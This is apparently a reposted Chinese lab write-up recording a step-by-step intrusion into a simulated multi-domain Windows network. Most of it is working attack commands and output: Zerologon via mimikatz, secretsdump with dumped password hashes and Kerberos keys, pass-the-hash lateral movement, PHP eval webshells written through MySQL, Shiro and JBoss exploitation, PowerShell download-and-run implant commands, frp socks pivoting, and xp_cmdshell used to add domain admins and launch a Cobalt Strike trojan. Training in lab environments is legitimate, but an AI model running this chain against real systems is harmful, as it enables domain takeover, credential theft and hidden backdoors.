综合环境靶场攻击过程记录(内网域森林+服务森林)上篇
综合环境靶场攻击过程记录(内网域森林+服务森林)中篇
综合环境靶场攻击过程记录(内网域森林+服务森林)下篇
攻击
6 攻击安全域(aq.dayu.com)
从子域控攻击
开放端口扫描
shell fscan.exe -h 10.10.10.66 -p 1-65535
10.10.10.66 MS17-010 (Windows Server 2016 Standard 14393)
WebTitle:http://10.10.10.66:47001 404 None
NetInfo:
[*]10.10.10.66
[->]WIN-D5NCBKR11G2
[->]10.10.10.66
[->]201.1.10.5
WebTitle:http://10.10.10.66:5985 404 None
WebTitle:http://10.10.10.66:8080 200 Apache Tomcat/8.5.65
WebTitle:http://10.10.10.66:80 200 phpStudy 鎺㈤拡 2014
scan end
6.1 CVE-2020-1472
6.2 上传mimikatz,CS上检测是否存在CVE-2020-1472漏洞
shell mimikatz "lsadump::zerologon /target:10.10.10.66 /account:WIN-D5NCBKR11G2$" "exit"
显示Authentication: OK — vulnerable表示存在,显示的不是这个就不能用!!
6.3 利用CVE-2020-1472修改域控密码为空:CS上利用mimikatz进行域控密码置空攻击
shell mimikatz "lsadump::zerologon /target:10.10.10.66 /account:WIN-D5NCBKR11G2$ /exploit" "exit"
回显
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
dayu(commandline) # exit
Bye!
表示已置零hash
6.4 获取hash:设置代理,在kali运行命令
设置代理:
proxychains设置:1.xxx.xxx.xx4 13633
proxychains impacket-secretsdump -no-pass -just-dc WIN-D5NCBKR11G2.dayu.com/WIN-D5NCBKR11G2\[email protected]
Administrator:500:aad3b435b51404eeaad3b435b51404ee:02f11ef066b46d613eaf9f257b8bbb6d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:426c5f15f41df761469e90b5dd0a6b4c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ch4nge3:1602:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::
WIN-D5NCBKR11G2$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SHEMI$:1105:aad3b435b51404eeaad3b435b51404ee:91a2b16d9ed7e1d5ff894f0f5b2c7393:::
DAYU$:1104:aad3b435b51404eeaad3b435b51404ee:553997b44662a5466f74e4560ce17668:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fab181e7a6abbe7e251ecac048ba30310a772f6346bd81acc652690ae95cc86b
Administrator:aes128-cts-hmac-sha1-96:069001aa334e63290f442877dcb022a5
Administrator:des-cbc-md5:ae674cf72ab9734a
krbtgt:aes256-cts-hmac-sha1-96:bb8359b13cd48a432555ba384150fd211638cdccfc18ba965b5f55e1389cf942
krbtgt:aes128-cts-hmac-sha1-96:2af954acdad5841d05613b38126ea25f
krbtgt:des-cbc-md5:b0c26b8af1d56d2a
ch4nge3:aes256-cts-hmac-sha1-96:e4281447f3f0a17c39e24cb95442944635ba40437b9b79d32cb468f2b3960617
ch4nge3:aes128-cts-hmac-sha1-96:0a655e8f163ede3be4b926c11579713a
ch4nge3:des-cbc-md5:cbe39b0e2c1fea86
WIN-D5NCBKR11G2$:aes256-cts-hmac-sha1-96:d31b897b7a8a275efb722874ca190aa119793339e360f9b9c7421fda5b5a99c2
WIN-D5NCBKR11G2$:aes128-cts-hmac-sha1-96:7593e99ec6b4d2fe1f9f59b36cbdaf78
WIN-D5NCBKR11G2$:des-cbc-md5:1cd0e5584c0ee6cd
SHEMI$:aes256-cts-hmac-sha1-96:d2b49bd5ec248d2751daa73522db2cbde89da46b8ff0a2239997777c256cdbde
SHEMI$:aes128-cts-hmac-sha1-96:e2383a414a3f60796503bafd0f29d45a
SHEMI$:des-cbc-md5:017f73467a5efd68
DAYU$:aes256-cts-hmac-sha1-96:ed560ea0f849c23df1b9090ecab17720fff22dd29ee11a0b289ce3eb2d89d134
DAYU$:aes128-cts-hmac-sha1-96:cde773ba83e8a9383ee22633769f488a
DAYU$:des-cbc-md5:929dad0220a74f0d
6.5 方法1:横向攻击&上线CS
利用wmiexec.exe进行横向攻击
wmiexec.exe -hashes :02f11ef066b46d613eaf9f257b8bbb6d ./[email protected]
6.6 方法二:web渗透上线CS–mysql数据库写入webshell
php探针
http://10.10.10.66
phpmyadmin,用户名密码都是root
http://10.10.10.66/phpmyadmin/
into oufile 写 shell–权限不行
首先基础语法查询 secure_file_priv 是否有限制
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录
show global variables like '%secure_file_priv%';
结果为null,不允许导入导出,无法利用
日志文件写 shell
SHOW VARIABLES LIKE 'general%';
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。
可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:
# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/cc.php';
# 查看当前配置
mysql> SHOW VARIABLES LIKE 'general%';
+------------------+-----------------------------+
| Variable_name | Value |
+------------------+-----------------------------+
| general_log | ON |
| general_log_file | /var/www/html/info.php |
+------------------+-----------------------------+
# 往日志里面写入 payload
select '<?php @eval($_POST[yyds]);?>';
# 此时已经写到 cc.php 文件当中了
蚁剑连接测试
成功连接
上线CS,administrator权限!。。截图省略
6.7 方法三:web渗透上线CS–Shiro命令执行
http://10.10.10.66:8080/shiro/
http://10.10.10.66:8080/shiro/login.jsp
直接用shiro命令执行利用脚本
shiro-1.2.4-rce
https://github.com/zhzyker/exphub
proxychains python3 shiro-1.2.4_rce.py http://10.10.10.66:8080/shiro/login.jsp
木马通过前面用的蚁剑放在了本服务器中
执行命令运行脚本失败,不知道什么原因
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/ch4nge-test2.exe','ch4nge-test2.exe');start-process ch4nge-test2.exe
6.8 安全域信息收集
1 双网卡
ip:201.1.10.5
网关:201.1.10.1
2 nbtscan 201.1.10.0/24
根据拼音判断206为涉密系统
201.1.10.206 AQ\SHEMI SHARING
*timeout (normal end of scan)
3 Cscan扫描结果
shell cscan.exe 201.1.10.0/24 MS17010
无返回信息,应该是机器中没有安装.Net Framework3.5
7 web-安全域做二级代理
配置文件
\/PS:
# frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 19831
子域普通web:
# frps.ini
[common]
bind_addr = 10.10.10.101
bind_port = 19831
# frpc.ini
[common]
server_addr = 1.xxx.xxx.xx4
server_port = 19831
[http_proxy]
type = tcp
local_ip = 10.10.10.101
local_port = 19833
remote_port = 19833
安全域
# frpc.ini
[common]
server_addr = 10.10.10.101
server_port = 19831
[http_proxy]
type = tcp
remote_port = 19833
plugin = socks5
执行顺序
1.执行web的frp服务器
frps.exe -c frps.ini
2.执行安全域的客户端
frpc.exe -c frpc.ini
web显示如下
3.执行\/ps的frp服务端
frps.exe -c frps.ini
4.执行web的客户端
frpc.exe -c frpc.ini
proxychains设置
1.xxx.xxx.xx4 19833
连接测试
8 攻击涉密机器:201.1.10.206
8.1 收集服务器信息:开放端口、应用系统等
shell fscan.exe -h 201.1.10.206 -p 1-65535
201.1.10.206 MS17-010 (Windows Server 2008 HPC Edition 7601 Service Pack 1)
NetInfo:
[*]201.1.10.206
[->]shemi
[->]201.1.10.206
[->]2002:c901:ace::c901:ace
mysql:201.1.10.206:3306:root root
WebTitle:http://201.1.10.206:47001 404 None
8.2 数据库写入webshell
php探针
http://201.1.10.206/
phpmyadmin,用户名密码都是root
http://201.1.10.206/phpmyadmin/
into oufile 写 shell
首先基础语法查询 secure_file_priv 是否有限制
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录
show global variables like '%secure_file_priv%';
结果为空,允许导入导出,可以利用
写入webshell
select '<?php @eval($_POST[yyds]);?>' into outfile 'C:/phpStudy/WWW/cc2.php';
蚁剑连接
CS在安全域会话上建立中转监听
使用此监听生成木马ch4nge3.exe
把木马放到蚁剑中,运行上线CS
方法二:日志文件写 shell
SHOW VARIABLES LIKE 'general%';
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。
可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:
# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/cch4nge.php';
# 查看当前配置
mysql> SHOW VARIABLES LIKE 'general%';
# 往日志里面写入 payload
select '<?php @eval($_POST[yyds]);?>';
# 此时已经写到 cch4nge.php 文件当中了
蚁剑连接
9 攻击父域普通用户:10.10.10.90
IP:10.10.10.90
proxy:1.xxx.xxx.xx4:13633
9.1 扫描开放端口服务信息
shell fscan.exe -h 10.10.10.90 -p 1-65535
NetInfo:
[*]10.10.10.90
[->]hexin
[->]10.10.10.90
WebTitle:http://10.10.10.90:8080 200 Welcome to JBoss AS
10.10.10.90 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
访问靶机-Jboss
http://10.10.10.90:8080/
9.2 弱口令
登录账号密码admin/admin
http://10.10.10.90:8080/admin-console/login.seam
9.3 上传war木马拿shell
网站语言是jsp,war木马就是把jsp的webshell做成zip压缩包,然后后缀名zip改为war就可以了
点击Add a new resource,上传war包:
选择做好的war包,默认点击continue
上传成功
点击创建的war包进入下一步,若状态为stop,点击Start按钮(默认都是start状态,不需要点击Start按钮):
访问webshell
9.4 上线CS
首先把后门木马放到web服务器中的C:\phpStudy\WWW路径
访问http://10.10.10.101/ch4nge2.exe就会下载
执行payload
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://10.10.10.101/ch4nge2.exe','ch4nge2.exe');start-process ch4nge2.exe
成功上线
9.5 提权
使用CS自带的提权工具
点击开始!成功提权
9.6 拿shell:方法2:JMX console未授权访问漏洞
直接点击JBoss主页中的JMX Console链接进入JMX Console页面。
进入jboss.system,在Jboss.system页面中点击service=MainDeployer,
进入service=MainDeployer页面之后,找到methodIndex为17 or 19的deploy填写远程war包地址进行远程部署:
将jsp大马做成的war包放在web机器的www目录下
访问测试一下,可以正常访问
输入http://10.10.10.66/ch4nge2.war
点击Invoke
访问jsp大马
10 攻击10.12.10.3
10.1 信息收集
信息收集时候得到信息如下
mssql:10.12.10.3:1433:sa admin@123
在域控administrator的桌面发现密码QWEasd123
尝试连接IPC,dayu和administrator用户均失败
shell net use \\10.12.10.3\ipc$ "QWEasd123" /user:10.12.10.3\administrator
说明密码不是远程桌面的
10.2 msfconsole利用命令执行模块
# 设置代理
setg Proxies socks5:1.xxx.xxx.xx4:13633
setg ReverseAllowProxy true
# 使用攻击模块
use admin/mssql/mssql_exec
set CMD whoami
set RHOSTS 10.12.10.3
set PASSWORD admin@123
run
创建domain管理用户成功,添加管理员组失败
net user ch4nge6 QWEasd123 /add /domain
net group "domain admins" ch4nge6 /add /domain
10.3 在本地的navicat连接mssql,进行命令执行操作
依次执行查询
# 查询xp_cmdshell是否开启
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
可以看到返回结果是1,说明现在的xp_cmdshell是开启状态
# 如果没有开启,执行下面命令开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
#命令执行,添加到admins组
master..xp_cmdshell 'net group "domain admins" ch4nge6 /add /domain'
查询是否是管理员组
10.4 在子域控制器使用IPC与10.12.10.3建立IPC连接
shell net use \\10.12.10.3\ipc$ "QWEasd123" /user:10.12.10.3\ch4nge6
在子域控制器的会话基础上建立中转监听
使用此监听生成木马ch4nge4.exe
将木马上传到子域控制器,使用IPC复制到10.12.10.3
shell copy ch4nge4.exe \\10.12.10.3\c$
shell dir \\10.12.10.3\c$
10.5 上线CS
使用数据库命令执行,执行木马
# 先建立一个隐蔽的文件夹,把木马移动进去
master..xp_cmdshell 'mkdir C:\Users\Administrator\Documents\dayuSetting'
master..xp_cmdshell 'move ch4nge4.exe C:\Users\Administrator\Documents\dayuSetting\'
运行木马,上线CS
master..xp_cmdshell 'cd C:\Users\Administrator\Documents\dayuSetting & ch4nge4.exe'
10.6 独立子域信息收集:10.12.10.3
1 ipconfig /all
双网卡:
me1: 10.12.10.3
域控: 10.12.10.3
dul.com
me2:20.20.20.10
2 nbtscan扫描20.20.20.0/24(独立域)
20.20.20.10 DUL\WIN-LOH5RS7UNDP SHARING DC
20.20.20.101 WORKGROUP\WIN-AMJ9T9TL123 SHARING
20.20.20.102 -no name-
20.20.20.103 -no name-
20.20.20.104 -no name-
20.20.20.105 -no name-
20.20.20.199 DUL\CAIWU SHARING
*timeout (normal end of scan)
3 Cscan扫描20.20.20.0/24
Cscan.exe 20.20.20.0/24 MS17010
Cscan 5.4
By K8gege
20.20.20.0/24
load MS17010
C_Segment: 20.20.20.
=============================================
20.20.20.10 MS17-010 WIN-LOH5RS7UNDP dul.com [Win 2008 HPC Edition 7601 SP 1]
20.20.20.101 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]
20.20.20.102 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]
20.20.20.104 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]
20.20.20.103 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]
20.20.20.105 WIN-AMJ9T9TL123 [Win 2016 Standard 14393]
20.20.20.199 MS17-010 CAIWU dul.com [Win 7 Professional 7601 SP 1]
=============================================
onlinePC:7
Finished!
4 fscan扫描20.20.20.101-105和199端口
shell fscan.exe -h 20.20.20.1/24 -p 1-65535
WebTitle:http://20.20.20.103:5985 404 None
WebTitle:http://20.20.20.103:47001 404 None
NetInfo:
[*]20.20.20.103
[->]WIN-AMJ9T9TL123
[->]20.20.20.103
20.20.20.10 MS17-010 (Windows Server 2008 HPC Edition 7601 Service Pack 1)
WebTitle:http://20.20.20.105:47001 404 None
WebTitle:http://20.20.20.105:5985 404 None
WebTitle:http://20.20.20.105:9060 404 None
WebTitle:http://20.20.20.105:9080 404 None
NetInfo:
[*]20.20.20.105
[->]WIN-AMJ9T9TL123
[->]20.20.20.105
WebTitle:http://20.20.20.10:47001 404 None
WebTitle:http://20.20.20.101:8080 200 Welcome to JBoss AS
NetInfo:
[*]20.20.20.104
[->]WIN-AMJ9T9TL123
[->]20.20.20.104
NetInfo:
[*]20.20.20.101
[->]WIN-AMJ9T9TL123
[->]20.20.20.101
WebTitle:https://20.20.20.105:9443 404 None
WebTitle:https://20.20.20.105:9043 404 None
mssql:20.20.20.10:1433:sa admin@123
WebTitle:http://20.20.20.104:5985 404 None
WebTitle:http://20.20.20.104:47001 404 None
WebTitle:http://20.20.20.104:8080 200 Apache Tomcat/8.5.65
WebTitle:http://20.20.20.101:47001 404 None
WebTitle:http://20.20.20.101:5985 404 None
WebTitle:https://20.20.20.105:8880 500 None
NetInfo:
[*]20.20.20.199
[->]caiwu
[->]20.20.20.199
[->]2002:1414:14c7::1414:14c7
NetInfo:
[*]20.20.20.102
[->]WIN-AMJ9T9TL123
[->]20.20.20.102
20.20.20.199 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
WebTitle:http://20.20.20.102:5985 404 None
WebTitle:http://20.20.20.102:47001 404 None
mysql:20.20.20.199:3306:root root
WebTitle:http://20.20.20.102:80 200 None
WebTitle:http://20.20.20.199:80 200 phpStudy 鎺㈤拡 2014
scan end
来源:freebuf.com 2021-06-16 09:02:10 by: ch4ngeba
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册